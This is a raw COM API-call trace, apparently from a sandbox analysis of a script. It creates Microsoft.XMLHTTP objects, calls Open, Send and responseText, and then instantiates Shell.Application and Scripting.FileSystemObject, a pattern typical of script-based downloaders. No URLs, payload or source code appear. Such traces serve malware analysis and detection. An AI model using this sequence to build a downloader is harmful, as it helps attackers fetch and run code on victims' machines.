	[0692.846] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0692.846] SysStringLen (param_1=0x0) returned 0x0
	[0692.846] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0692.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0692.847] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0692.847] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0692.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0692.847] ??2@YAPEAX_K@Z () returned 0x62f330
	[0692.847] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0692.847] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0692.847] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0692.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0692.847] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0692.847] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0692.847] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0692.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0692.848] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0692.848] SysStringLen (param_1=0x0) returned 0x0
	[0692.848] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0692.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0692.848] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0692.848] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0692.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72c8) returned 0x0
	[0692.848] ??2@YAPEAX_K@Z () returned 0x62f310
	[0692.848] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72c8, pUnkSite=0x62f310) 
	[0692.848] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0692.848] XMLHTTPRequest:IUnknown:Release (This=0x49c72c8) returned 0x0
	[0692.848] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0692.849] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0692.849] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0692.849] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0692.849] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0692.849] longjmp () 
	[0692.849] longjmp () 
	[0692.849] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0692.849] SysStringLen (param_1=0x0) returned 0x0
	[0692.849] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0692.850] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0692.850] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0692.850] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0692.850] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0692.850] ??2@YAPEAX_K@Z () returned 0x62f330
	[0692.850] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0692.850] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0692.850] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0692.850] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0692.850] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0692.850] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0692.850] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0692.850] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0692.851] longjmp () 
	[0692.851] longjmp () 
	[0692.851] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0692.851] SysStringLen (param_1=0x0) returned 0x0
	[0692.851] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0692.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0692.851] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0692.851] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0692.851] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0692.851] ??2@YAPEAX_K@Z () returned 0x62f310
	[0692.851] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0692.851] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0692.852] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0692.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0692.852] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0692.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0692.852] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0692.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0692.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0692.852] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0692.852] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0693.680] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0693.681] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0693.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0693.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0693.681] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0693.681] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0693.681] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0693.681] SysStringLen (param_1=0x0) returned 0x0
	[0693.681] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0693.682] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0693.682] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0693.682] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0693.682] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0693.682] ??2@YAPEAX_K@Z () returned 0x62f350
	[0693.682] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0693.682] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0693.682] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0693.682] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0693.682] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0693.682] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0693.682] SysStringLen (param_1=0x0) returned 0x0
	[0693.682] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0693.685] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0693.685] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0693.685] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0693.685] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0693.685] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0693.686] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0700.166] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0700.167] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0700.167] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
